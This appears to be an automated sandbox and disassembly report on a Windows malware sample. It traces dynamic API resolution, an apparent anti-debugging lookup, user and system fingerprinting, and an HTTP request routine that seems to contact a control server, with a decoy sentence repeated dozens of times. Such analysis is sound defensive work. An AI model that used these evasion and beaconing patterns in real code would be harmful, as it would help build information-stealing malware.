                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                            • strlen.MSVCRT ref: 004046F0
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                            Strings
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                            • API String ID: 2127927946-2218711628
                                            • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                            • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                            • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                            • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                            APIs
                                            • GetProcAddress.KERNEL32(77190000,02DF9B70), ref: 004198A1
                                            • GetProcAddress.KERNEL32(77190000,02DF9E70), ref: 004198BA
                                            • GetProcAddress.KERNEL32(77190000,02DF9E10), ref: 004198D2
                                            • GetProcAddress.KERNEL32(77190000,02DF9E58), ref: 004198EA
                                            • GetProcAddress.KERNEL32(77190000,02DF9DB0), ref: 00419903
                                            • GetProcAddress.KERNEL32(77190000,02E24D30), ref: 0041991B
                                            • GetProcAddress.KERNEL32(77190000,02DF6C00), ref: 00419933
                                            • GetProcAddress.KERNEL32(77190000,02DF6BE0), ref: 0041994C
                                            • GetProcAddress.KERNEL32(77190000,02DF9DF8), ref: 00419964
                                            • GetProcAddress.KERNEL32(77190000,02DF9DC8), ref: 0041997C
                                            • GetProcAddress.KERNEL32(77190000,02DF9E28), ref: 00419995
                                            • GetProcAddress.KERNEL32(77190000,02DF9E40), ref: 004199AD
                                            • GetProcAddress.KERNEL32(77190000,02DF6C20), ref: 004199C5
                                            • GetProcAddress.KERNEL32(77190000,02DF9DE0), ref: 004199DE
                                            • GetProcAddress.KERNEL32(77190000,02DF9438), ref: 004199F6
                                            • GetProcAddress.KERNEL32(77190000,02DF6960), ref: 00419A0E
                                            • GetProcAddress.KERNEL32(77190000,02DF94F8), ref: 00419A27
                                            • GetProcAddress.KERNEL32(77190000,02DF9420), ref: 00419A3F
                                            • GetProcAddress.KERNEL32(77190000,02DF6900), ref: 00419A57
                                            • GetProcAddress.KERNEL32(77190000,02DF9540), ref: 00419A70
                                            • GetProcAddress.KERNEL32(77190000,02DF69C0), ref: 00419A88
                                            • LoadLibraryA.KERNEL32(02DF9648,?,00416A00), ref: 00419A9A
                                            • LoadLibraryA.KERNEL32(02DF96C0,?,00416A00), ref: 00419AAB
                                            • LoadLibraryA.KERNEL32(02DF9498,?,00416A00), ref: 00419ABD
                                            • LoadLibraryA.KERNEL32(02DF9660,?,00416A00), ref: 00419ACF
                                            • LoadLibraryA.KERNEL32(02DF9678,?,00416A00), ref: 00419AE0
                                            • GetProcAddress.KERNEL32(76850000,02DF95D0), ref: 00419B02
                                            • GetProcAddress.KERNEL32(77040000,02DF9690), ref: 00419B23
                                            • GetProcAddress.KERNEL32(77040000,02DF9510), ref: 00419B3B
                                            • GetProcAddress.KERNEL32(75A10000,02DF9468), ref: 00419B5D
                                            • GetProcAddress.KERNEL32(75690000,02DF6B60), ref: 00419B7E
                                            • GetProcAddress.KERNEL32(776F0000,02E24D50), ref: 00419B9F
                                            • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00419BB6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$LibraryLoad
                                            • String ID: F+t$NtQueryInformationProcess
                                            • API String ID: 2238633743-4160208271
                                            • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                            • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                            • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                            • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                            • StrCmpCA.SHLWAPI(?,02E26370), ref: 0040493A
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,02E2AF50), ref: 00404DE8
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                            • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                            • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                            • HttpOpenRequestA.WININET(00000000,02E2AF30,?,02E2A4E0,00000000,00000000,00400100,00000000), ref: 00404B15
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID: "$"$------$------$------
                                            • API String ID: 2402878923-2180234286
                                            • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                            • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                            • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                            • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocNameProcessUser
                                            • String ID:
                                            • API String ID: 1206570057-0
                                            • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                            • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                            • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                            • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                            APIs
                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                            • ExitProcess.KERNEL32 ref: 0040117E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitInfoProcessSystem
                                            • String ID:
                                            • API String ID: 752954902-0
                                            • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                            • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                            • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                            • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                            APIs
                                            • GetProcAddress.KERNEL32(77190000,02DF6A20), ref: 00419C2D
                                            • GetProcAddress.KERNEL32(77190000,02DF6BA0), ref: 00419C45
                                            • GetProcAddress.KERNEL32(77190000,02DF9618), ref: 00419C5E
                                            • GetProcAddress.KERNEL32(77190000,02DF9630), ref: 00419C76
                                            • GetProcAddress.KERNEL32(77190000,02DF96A8), ref: 00419C8E
                                            • GetProcAddress.KERNEL32(77190000,02DF93D8), ref: 00419CA7
                                            • GetProcAddress.KERNEL32(77190000,02DF42F8), ref: 00419CBF
                                            • GetProcAddress.KERNEL32(77190000,02DF93F0), ref: 00419CD7
                                            • GetProcAddress.KERNEL32(77190000,02DF9408), ref: 00419CF0
                                            • GetProcAddress.KERNEL32(77190000,02DF9738), ref: 00419D08
                                            • GetProcAddress.KERNEL32(77190000,02DF9720), ref: 00419D20
                                            • GetProcAddress.KERNEL32(77190000,02DF6920), ref: 00419D39
                                            • GetProcAddress.KERNEL32(77190000,02DF6A80), ref: 00419D51
                                            • GetProcAddress.KERNEL32(77190000,02DF6A60), ref: 00419D69
                                            • GetProcAddress.KERNEL32(77190000,02DF68A0), ref: 00419D82
                                            • GetProcAddress.KERNEL32(77190000,02DF96D8), ref: 00419D9A
                                            • GetProcAddress.KERNEL32(77190000,02DF9750), ref: 00419DB2
                                            • GetProcAddress.KERNEL32(77190000,02DF41E0), ref: 00419DCB
                                            • GetProcAddress.KERNEL32(77190000,02DF6A40), ref: 00419DE3
                                            • GetProcAddress.KERNEL32(77190000,02DF96F0), ref: 00419DFB
                                            • GetProcAddress.KERNEL32(77190000,02DF9708), ref: 00419E14
                                            • GetProcAddress.KERNEL32(77190000,02DF9768), ref: 00419E2C
